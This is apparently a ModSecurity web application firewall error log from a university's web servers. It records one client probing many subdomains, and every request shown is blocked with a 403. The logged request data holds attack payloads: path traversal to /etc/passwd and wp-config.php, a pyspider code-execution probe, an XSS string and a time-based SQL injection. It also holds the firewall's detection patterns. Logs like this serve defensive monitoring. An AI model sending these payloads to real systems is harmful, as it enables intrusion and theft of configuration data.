[Tue Aug 29 11:37:45.392415 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXCUGsAAAAG"]
[Tue Aug 29 11:37:45.417434 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12GcCo-f0AAAXSzuAAAAAA"]
[Tue Aug 29 11:37:45.457718 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXSzuIAAAAA"]
[Tue Aug 29 11:37:45.479681 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWpXrMAAAAW"]
[Tue Aug 29 11:37:45.494657 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXCUG8AAAAG"]
[Tue Aug 29 11:37:47.489440 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXEH@YAAAAN"]
[Tue Aug 29 11:37:47.491725 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWpXr0AAAAW"]
[Tue Aug 29 11:37:47.504522 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWurFYAAAAZ"]
[Tue Aug 29 11:37:47.508641 2023] [:error] [pid 1492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXU5IgAAAAD"]
[Tue Aug 29 11:37:47.548520 2023] [:error] [pid 1492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXU5IoAAAAD"]
[Tue Aug 29 11:37:50.415733 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXCUIkAAAAG"]
[Tue Aug 29 11:37:50.439193 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12HsCo-f0AAAW7FOUAAAAE"]
[Tue Aug 29 11:37:50.439381 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXEH-cAAAAN"]
[Tue Aug 29 11:37:50.476337 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXCUIoAAAAG"]
[Tue Aug 29 11:37:50.479637 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWurGcAAAAZ"]
[Tue Aug 29 11:37:50.502752 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWvFNgAAAAa"]
[Tue Aug 29 11:37:52.385587 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAWvFNwAAAAa"]
[Tue Aug 29 11:37:52.386875 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXEH-wAAAAN"]
[Tue Aug 29 11:37:52.408933 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAUFdo0AAAA9"]
[Tue Aug 29 11:37:52.427153 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXEH-4AAAAN"]
[Tue Aug 29 11:37:52.489525 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXA9ksAAAAO"]
[Tue Aug 29 11:37:53.374687 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12IcCo-f0AAAXEIAIAAAAN"]
[Tue Aug 29 11:37:58.506084 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12JsCo-f0AAAUFdqMAAAA9"]
[Tue Aug 29 11:37:59.365113 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXVynUAAAAB"]
[Tue Aug 29 11:37:59.371880 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAUFdqcAAAA9"]
[Tue Aug 29 11:37:59.388819 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXWLHYAAAAD"]
[Tue Aug 29 11:37:59.419192 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXXhe0AAAAF"]
[Tue Aug 29 11:37:59.419450 2023] [:error] [pid 1494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO12J8Co-f0AAAXWLHcAAAAD"]
[Tue Aug 29 11:37:59.439363 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:logfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:logfile: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZO12J8Co-f0AAAXXhe4AAAAF"]
[Tue Aug 29 11:37:59.478627 2023] [:error] [pid 1495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lastname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:lastname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 